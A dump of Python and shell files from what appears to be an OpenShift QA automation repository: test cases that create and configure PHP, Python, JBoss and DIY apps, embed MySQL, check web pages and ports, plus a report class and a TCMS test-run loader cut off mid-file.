4998, "license_type": "no_license", "max_line_length": 105, "num_lines": 162, "path": "/automation/open/testmodules/RT/Demo02.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n#\n# File name: Demo02.py\n# Date: 2012/05/11 14:50\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport common, OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = 'CtrApp1'\n self.app_type = 'php'\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%self.app_name) \n\nclass Demode02(OpenShiftTest):\n\n def create_app(self, *args, **kwargs): \n if kwargs.has_key(\"some_argument\"):\n print \"Possible argument received: \", kwargs['some_argument']\n if kwargs.has_key(\"app_name\"):\n print \"Another argument received: \", kwargs['app_name']\n self.app_name=kwargs['app_name']\n\n return common.create_app(self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True)\n\n def embed_app(self, *args, **kwargs):\n if len(args)>0:\n cartridge=args[0]\n else:\n cartridge = 'mysql'\n\n return common.embed(self.app_name, \n \"add-%s\"%common.cartridge_types[cartridge], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n\n def add_file(self, *args, **kwargs):\n if len(args)>0:\n filename=args[0]\n else:\n filename= \"testing.php\"\n f = open(\"%s/%s\"%(self.app_name, filename), \"wb\")\n f.write(\"\"\"\n<?php\nphpinfo();\n\n?>\n\n\"\"\")\n def grep_app(self, *args, **kwargs):\n last_output = self.get_output_from_last_step()\n print \"DEBUG: previous output:\", last_output\n url=OSConf.get_app_url(self.app_name)\n if len(args)>0:\n find_str = args[0]\n else:\n find_str = 'OpenShift'\n return common.grep_web_page(url, find_str)\n \n\n def test_method(self):\n\n step1 = self.add_step(\"Create an app\",\n self.create_app,\n function_parameters = {\"some_argument\": \"i_dont_know\"}, # also as dict() ...\n expect_str = [ #case sensitive for re.match()\n \"Now your new domain name is being propagated worldwide\", \n \"creation returned success\"],\n expect_return=0)\n\n step2_embed = self.add_step(\"Embed it\",\n self.embed_app,\n expect_return=0,\n unexpect_istr = \"This shouln't be there\", #case insesitive for re.match()\n expect_description=\"Embed should work...\")\n\n step3 = self.add_step(\"Add file\",\n self.add_file,\n function_parameters=[\"filename.php\"]) #default args for self.add_file\n\n step4 =self.add_step(\"Check the app via web\", \n self.grep_app,\n expect_return=0,\n try_count=3,\n try_interval=4)\n\n step5 = self.add_step(\"Git commit new file\",\n \"cd %s && touch X && git add X && git commit -a -m 'xx' && git push\"%self.app_name,\n expect_description=\"The output of push should contain something...\",\n expect_str=[\"remote: \"],\n expect_return=0)\n\n step6 = self.add_step(\"Local command with arguments:\", \n \"nslookup %s\",\n function_parameters=\"www.redhat.com\", #can be even string \n expect_str = [\"192.168.122.1\"],\n try_count=2,\n expect_return=0)\n\n\n step1(some_argument=\"argument\")\n\n step2_embed() #use default parameters\n step2_embed(\"cron\") #this step doesn't require checking results, \n\n (ret, output) = step3(\"This_is_the_file_I_want.php\")\n if (ret == 0):\n self.info(\"Everything is ok, let's continue with step4\")\n obj = re.search(r\"remote:(.*)\", output)\n if (obj):\n step4(obj.group(1))\n else:\n return self.failed(\"Unable to parse important output.\")\n else:\n self.info(\"Despite this problem, let's do something else... git...\")\n step5()\n\n step6() #nslookup with default arguments\n for url in [\"www.google.com\", \"www.yahoo.com\"]:\n step6(url)\n\n return self.passed()\n\n # or you can run this if you are satisfied with only sequence\n #return self.run_steps()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Demode02)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of Demo02.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5951020121574402, "alphanum_fraction": 0.5967347025871277, "avg_line_length": 30.81818199157715, "blob_id": "a0a1f0cf85eae2b7f301fa79635d95e7630ed726", "content_id": "ef8c1494703e102af7c5ac1e07dfffb81426ac60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2450, "license_type": "no_license", "max_line_length": 99, "num_lines": 77, "path": "/automation/open/testmodules/RT/quick_start/quick_start_liferay.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartLiferay(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"jbossas\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types[\"mysql\"] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: JBoss AS Liferay\"\n self.config.git_upstream_url = \"git://github.com/openshift/jbossas7-liferay-quickstart.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"OpenShift\"\n \n def initialize(self):\n self.log_info(\"Initializing\")\n # General set-up\n common.env_setup()\n\n size = \"medium\" \n # Changing node profile and VIP flag\n if self.get_run_mode() == \"DEV\":\n common.change_node_profile(\"medium\")\n common.add_gearsize_capability('medium')\n elif self.get_run_mode() == \"OnPremise\":\n size = \"small\"\n \n # Creating the application\n common.create_app(\n self.config.application_name,\n self.config.application_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = True,\n git_repo = \"./\" + self.config.application_name,\n gear_size = size\n )\n \n # Embedding cartridges\n for cartridge in self.config.application_embedded_cartridges:\n common.embed(\n self.config.application_name,\n \"add-\" + cartridge,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd\n )\n \n def post_deployment_steps(self):\n pass\n #sleep(120)\n \n def finalize(self):\n QuickStartTest.finalize(self)\n if self.get_run_mode() == \"DEV\":\n common.change_node_profile()\n common.remove_gearsize_capability('medium')\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartLiferay)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6090577840805054, "alphanum_fraction": 0.6304008364677429, "avg_line_length": 23.9350643157959, "blob_id": "a2a5b2ffbc87989a80650962f66a595c2871bcd9", "content_id": "c791111bed927dac206ce65924f02a0fed68f79e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1921, "license_type": "no_license", "max_line_length": 110, "num_lines": 77, "path": "/automation/open/testmodules/UI/web/case_180954.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180954.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateSpringEapAppAndChangeDomainName(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a springeap app\n #web.create_app(\"springeap6\",\"springeap\")\n web.go_to_create_app(\"springeap6\")\n web.input_by_id(\"application_name\", \"springeap\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(20)\n \n \n web.go_to_domain_edit()\n web.input_by_id(\"domain_name\",\"yujzhangcccc\")\n web.click_element_by_id(\"domain_submit\")\n time.sleep(15)\n \n\n #check the url after changed the domain name\n web.go_to_app_detail(\"springeap\")\n web.assert_element_present_by_link_text(\"http://springeap-yujzhangcccc.\"+web.platform+\".rhcloud.com/\")\n #change the domain name back\n web.go_to_domain_edit()\n web.input_by_id(\"domain_name\",web.domain)\n web.click_element_by_id(\"domain_submit\")\n time.sleep(15)\n \n #delete a springeap app\n web.delete_last_app(\"springeap\")\n \n self.tearDown()\n\n return self.passed(\" case_180954--CreateSpringEapAppAndChangeDomainName passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateSpringEapAppAndChangeDomainName)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174336.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5917180180549622, "alphanum_fraction": 0.6023271679878235, "avg_line_length": 34.192771911621094, "blob_id": "1427d445f360dc9c59504152bf857c04a5d2fedc", "content_id": "26151771b1b0d1c8ed2228ab96cb8d3b0074e28a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2922, "license_type": "no_license", "max_line_length": 210, "num_lines": 83, "path": "/automation/open/testmodules/RT/cartridge/wsgi_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]wsgi/Python framework support\nhttps://tcms.engineering.redhat.com/case/122300/\n\"\"\"\nimport os,sys,re\n\nimport testcase,common,OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]wsgi/Python framework support\"\n\n self.app_name = \"wsgiframework\"\n self.app_type = common.app_types[\"wsgi\"]\n self.git_repo = \"./%s\" % (self.app_name)\n tcms_testcase_id=122300\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass WsgiFrameworkSupport(OpenShiftTest):\n def test_method(self):\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an wsgi app: %s\" % (self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Make some change to the git repo and git push\n cmd = \"rm -rf %s/wsgi/application && cp %s/app_template/wsgi.template %s/wsgi/application && cd %s && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR, self.git_repo, self.git_repo)\n self.steps_list.append( testcase.TestCaseStep(\"2.Make some change to the git repo\",\n cmd,\n expect_description=\"Copy succeed\",\n expect_return=0))\n\n # 3.Check the app via browser\n test_html = \"WSGI test script is working\"\n self.steps_list.append( testcase.TestCaseStep(\"3.Check the app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \n test_html, \n \"-H 'Pragma: no-cache'\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(WsgiFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6039381623268127, "alphanum_fraction": 0.6091724634170532, "avg_line_length": 32.43333435058594, "blob_id": "ddc9eca1e16e4e29366c95186b06e43bbd4713f4", "content_id": "60bdad5c070d4b88b452c63d6ff93c179573d894", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4012, "license_type": "no_license", "max_line_length": 158, "num_lines": 120, "path": "/automation/open/testmodules/RT/scaling/non_scalable_app_exposing_port.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = 'DEV'\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.domain_name = common.get_domain_name()\n self.test_variant=self.config.test_variant\n self.app_type = common.app_types[self.test_variant]\n self.app_name = 'my%s%s' % ( self.test_variant, common.getRandomString() )\n tcms_testcase_id = 138428\n self.rest_client = openshift.Openshift(host=self.config.instance_info['ip'],\n user=self.user_email,\n passwd=self.user_passwd)\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass NonScalableAppExposingPort(OpenShiftTest):\n def existing_exposed_ports(self):\n \n (gears, number_of_gears) = self.rest_client.get_gears(self.app_name, self.domain_name)\n\n exposed_ports = 0\n for component in gears[0]['components']:\n if component['proxy_port'] != None and component['proxy_host'] != None:\n exposed_ports += 1\n\n return exposed_ports\n\n def exposing_port(self, cartridge):\n return common.run_remote_cmd_as_root(\n \"/usr/libexec/openshift/cartridges/embedded/%s/info/hooks/expose-port %s %s %s\" %\n (\n cartridge,\n self.app_name,\n self.domain_name,\n OSConf.get_app_uuid(self.app_name)\n )\n )[0]\n\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Creating an application\",\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, self.user_email, self.user_passwd, False ],\n expect_description = \"The application must be created successfully\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Embedding MySQL cartridge\",\n common.embed,\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"MySQL cartridge must be embedded successfully\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Verifying the number of exposed ports\",\n self.existing_exposed_ports,\n expect_description = \"The number of exposed ports must be 0\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Expose port information\",\n self.exposing_port,\n function_parameters = [ common.cartridge_types['mysql'] ],\n expect_description = \"The operation must be successfull\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Verifying the number of exposed ports after the manual exposion\",\n self.existing_exposed_ports,\n expect_description = \"The number of exposed ports must be 1\",\n expect_return = 1\n ))\n\n case = testcase.TestCase(\"[US1907][BusinessIntegration] Retrive gear information by explicitly exposing port for a non-scalable app\", self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NonScalableAppExposingPort)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6520400047302246, "alphanum_fraction": 0.656658947467804, "avg_line_length": 23.05555534362793, "blob_id": "4469950f8bf7defda73feecf0017e99884c4081b", "content_id": "33335b4156972a2203831cbc5c6d859d7db28760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1299, "license_type": "no_license", "max_line_length": 69, "num_lines": 54, "path": "/automation/open/lib/reports/Curses.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab\n# \n#\n\n\"\"\"\nReport object that connects to CLI CursesIO object.\n\n\"\"\"\n\nimport sys\n\nimport reports\nimport cursesio\n\nclass CursesReport(reports.NullReport):\n def __init__(self, ui=None):\n self._ui = ui or cursesio.get_curses_ui()\n\n def write(self, text):\n return self._ui.write(text)\n def writeline(self, text=\"\"):\n return self._ui.writeline(text)\n def writelines(self, lines):\n return self._ui.writelines(lines)\n\n\tdef initialize(self, *args): pass\n\tdef logfile(self, filename): pass\n\tdef finalize(self): pass\n\tdef add_title(self, title): pass\n\tdef add_heading(self, text, level=1): pass\n\tdef add_message(self, msgtype, msg, level=1):\n self._ui.write(\"%s%s: %s\\n\" % (\" \"*(level-1), msgtype, msg))\n# XXX\n\tdef add_summary(self, text): pass\n\tdef add_text(self, text): pass\n\tdef add_url(self, text, url): pass\n\tdef passed(self, msg=NO_MESSAGE): pass\n\tdef failed(self, msg=NO_MESSAGE): pass\n\tdef incomplete(self, msg=NO_MESSAGE): pass\n\tdef abort(self, msg=NO_MESSAGE): pass\n\tdef info(self, msg): pass\n\tdef diagnostic(self, msg): pass\n\tdef newpage(self): pass\n\tdef newsection(self): pass\n\n\n\ndef _test(argv):\n pass # XXX\n\nif __name__ == \"__main__\":\n _test(sys.argv)\n" }, { "alpha_fraction": 0.5679728984832764, "alphanum_fraction": 0.5747460126876831, "avg_line_length": 40.34000015258789, "blob_id": "22ff6d919c5eb612834a1a9f52741636b0ea65e7", "content_id": "0ec6fd5f8382fce76dcefe683c0887531b9ced6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2067, "license_type": "no_license", "max_line_length": 254, "num_lines": 50, "path": "/automation/open/testmodules/RT/cartridge/app_template/mysql/applicationpython-2.7", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport MySQLdb\n\ndef mysql():\n content='GEAR DNS: ' + os.environ['OPENSHIFT_GEAR_DNS'] + '\\n'\n try:\n con=MySQLdb.connect(host=os.environ['OPENSHIFT_MYSQL_DB_HOST'], user=os.environ['OPENSHIFT_MYSQL_DB_USERNAME'], passwd=os.environ['OPENSHIFT_MYSQL_DB_PASSWORD'], db=os.environ['OPENSHIFT_APP_NAME'],port=int(os.environ['OPENSHIFT_MYSQL_DB_PORT']))\n cursor = con.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS ucctalk\")\n cursor.execute(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n cursor.execute(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\")\n cursor.execute(\"SELECT * FROM ucctalk\")\n alldata = cursor.fetchall()\n if alldata:\n for rec in alldata:\n content+=rec[0]+\", \"+rec[1]+\"\\n\"\n cursor.close()\n con.commit ()\n con.close()\n except Exception, e:\n content = str(e)\n return content\n\ndef application(environ, start_response):\n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\" \n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n response_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/mysql':\n response_body = mysql()\n else:\n ctype = 'text/html'\n response_body = '''<!doctype html>\n</html>'''\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.6515973210334778, "alphanum_fraction": 0.670283317565918, "avg_line_length": 28.60714340209961, "blob_id": "73c00d0cb08e29ad512cd94f8221ba55b9bda953", "content_id": "9d72969bf985c7feabc413608b677feb9e672bfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1659, "license_type": "no_license", "max_line_length": 130, "num_lines": 56, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_raw.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1221][rhc-cartridge] embed MySQL instance to DIY application\nhttps://tcms.engineering.redhat.com/case/122382/\n\"\"\"\nimport os\nimport sys\n\nimport rhtest\nimport testcase\nimport common\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US1221][rhc-cartridge] embed MySQL instance to DIY application\"\n self.app_name = \"diy\"\n self.app_type = common.app_types[\"diy\"]\n tcms_testcase_id=122382\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToRaw(OpenShiftTest):\n def test_method(self):\n #\"Create a diy app\", \n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret,0, \"the app should be created successfully\")\n\n #\"Embed mysql to the app\", \n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"])\n self.assert_equal(ret, 0, \"the mysql cartridge should be embedded successfully\")\n\n #\"Remove embedded mysql from the app\", \n ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"])\n self.assert_equal(ret,0, \"the mysql should be removed successfully\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToRaw)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.61078941822052, "alphanum_fraction": 0.6150563955307007, "avg_line_length": 29.952829360961914, "blob_id": "bff73c5572a1b6f7c1795d29015fb89331ddb099", "content_id": "ea80146cfcb11e7ab5515b4b646a1956fddc9e7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3281, "license_type": "no_license", "max_line_length": 141, "num_lines": 106, "path": "/automation/open/testmodules/RT/limits/outbound_mail_port.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = \"python\"\n self.app_name = 'my%s%s' % ( self.app_type, common.getRandomString() )\n self.git_repo = './' + self.app_name\n tcms_testcase_id=130873\n \n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass OutboundMailPort(OpenShiftTest):\n\n def app_config(self, git_repo, work_dir):\n configuration_steps = [\n \"cd %s\" % ( git_repo ),\n \"cp -fv %s/app_template/outbound_mail_port/application wsgi/application\" % ( work_dir ),\n \"git commit -a -m deployment\",\n \"git push\"\n ]\n\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(configuration_steps))\n print ret_output\n return ret_code\n\n def check_port_result(self, app_name, path, pattern):\n app_url = OSConf.get_app_url(app_name)\n return common.grep_web_page(\"http://%s/%s\" % ( app_url, path ) , pattern )\n\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating the application',\n common.create_app,\n function_parameters = [ self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, True, self.git_repo ],\n expect_description = 'The app should be created successfully',\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Configuring our Python application',\n self.app_config,\n function_parameters = [ self.git_repo, WORK_DIR ],\n expect_description = 'App configuration should be successful',\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking outbound mail ports',\n self.check_port_result,\n function_parameters = [ self.app_name, 'scan', \" Connected\" ],\n expect_description = \"The application should access at least one of Google's mail ports\",\n expect_return = 0\n ))\n\n step=testcase.TestCaseStep(\n \"Destroy app: %s\" % (self.app_name),\n common.destroy_app,\n function_parameters = [self.app_name],\n expect_return = 0)\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[rhc-cartridge][US1742] Outbound mail port\", self.steps_list )\n case.run()\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(OutboundMailPort)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6421319842338562, "alphanum_fraction": 0.682741105556488, "avg_line_length": 29.30769157409668, "blob_id": "c46d1e9fb676fe9d867b0ddb73823d6bbcbe36a6", "content_id": "84da466bd31956e05239bdbb4e248ae78eb07999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 394, "license_type": "no_license", "max_line_length": 64, "num_lines": 13, "path": "/automation/open/Longevity/cartridge/mysql_insert.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\nmysql -uroot<<EOF\nuse $1\ncreate table test(id int(8), name char(20));\ninsert into test values('0','openshifit');\ninsert into test values('1','nsun');\nselect * from test;\nEOF\n\n#drop table test\n#mysql -Druby0 \"create table test(id int(8), name char(20));\"\n#mysql -Druby0 -e \"create table test(id int(8), name char(20));\"\n#mysql -Druby0 -e \"insert into test values('0','openshifit');\"\n" }, { "alpha_fraction": 0.6075631976127625, "alphanum_fraction": 0.6112290024757385, "avg_line_length": 43.43965530395508, "blob_id": "2dd3448d6a3a53a7f6e86775c3f3a7f8954eee7e", "content_id": "fadc3ad0a8e59705d23ad1355721fde3a913c4c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5183, "license_type": "no_license", "max_line_length": 173, "num_lines": 116, "path": "/automation/open/testmodules/UI/web/testrun.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import unittest, time, re\nimport baseutils\nimport sys\nimport re\nfrom optparse import OptionParser \nimport commands\nimport subprocess\nimport random\nimport TCMS\nimport TCMSTestRunner\n\n'''\n1. get the list of scripts from TCMS\n2. run them one by one\n3. do update\n'''\n\ndef get_classname_from_testcase(script_file):\n f = open(script_file, \"r\")\n obj = re.search(r\"class\\s+([^\\(]+)\\(\", f.read())\n f.close()\n if obj:\n print obj.group(1)\n return obj.group(1)\n else:\n raise Exception(\"Unable to get classname from %s.\"%script_file)\n\n\ndef testrun_suite(testrun_id):\n '''\n Returns a array of\n '''\n suites = []\n try:\n openshift = TCMS.OpenShift(4962, 'demo', repo='./openshift_web')\n script_list = openshift.get_testrun_scripts(testrun_id)\n except Exception as e:\n raise e\n\n for s in script_list:\n tcms_suite=unittest.TestSuite()\n try:\n script_name = s['script']\n print \"DEBUG: script: %s\"%script_name\n #TODO:obj = re.search(r\"(.*)/([^/]+).py\",script_name)\n obj = re.search(r\"(.*).py\",script_name)\n module_name = obj.group(1)\n #print \"Importing %s\"%module_name\n exec \"import %s\"%module_name\n #print \"Done.\"\n classname = get_classname_from_testcase(script_name) \n #print \"tcms_suite=unittest.TestLoader().loadTestsFromTestCase(%s.%s)\"%(module_name, classname)\n #exec \"tcms_suite=unittest.TestLoader().loadTestsFromTestCase(%s.%s)\"%(module_name, classname)\n exec \"tcms_suite=unittest.TestLoader().loadTestsFromTestCase(%s.%s)\"%(module_name, classname)\n tcms_suite.case_run_id=s['case_run_id']\n#\n#hack the class: add title,script for the first object\n#\n #For all possible test cases... def test_X_...\n for i in range(len(tcms_suite._tests)):\n tcms_suite._tests[i].title = s['title']\n tcms_suite._tests[i].case_id = s['case_id']\n tcms_suite._tests[i].script = s['script']\n tcms_suite._tests[i].case_run_id= s['case_run_id']\n suites.append(tcms_suite)\n except Exception as e:\n raise Exception(e)\n\n return unittest.TestSuite(suites)\n\n\nif __name__ == \"__main__\":\n i=random.uniform(1,10)\n generate_new_user=\"libra-test+stage\"+str(i)[3:10]+\"@redhat.com\"\n baseutils.update_config_file('environment','new_user',generate_new_user)\n if len(sys.argv) < 2:\n print \"\"\"usage: --url=<url> --testrun_id=<testrun_id> --browser=<browser> --new_user=<new_user> --title=<title> --description=<decription> --proxy=<http://proxy>\"\"\"\n sys.exit(1)\n else:\n parser = OptionParser()\n parser.add_option(\"--url\", dest=\"url\",default=\"https://openshifttest.redhat.com\",\n help=\"url link\")\n parser.add_option(\"--browser\", dest=\"browser\",default=\"firefox\",\n help=\"browser name\")\n parser.add_option(\"--browserpath\", dest=\"browserpath\",default=0,\n help=\"browser path\")\n parser.add_option(\"--proxy\", dest=\"proxy\", default=\"\",\n help=\"Proxy URL\")\n parser.add_option(\"--new_user\", dest=\"new_user\",\n help=\"new user\")\n parser.add_option(\"--resultfile\", dest=\"resultfile\",default=\"OpenShift.WebTestResult.html\",\n help=\"result file name\")\n parser.add_option(\"--title\", dest=\"title\",default=\"OpenShift Web Test Report\",\n help=\"result file title\")\n parser.add_option(\"--description\", dest=\"description\",default=\"This is OpenShift Web Test Result\",\n help=\"result file description\")\n 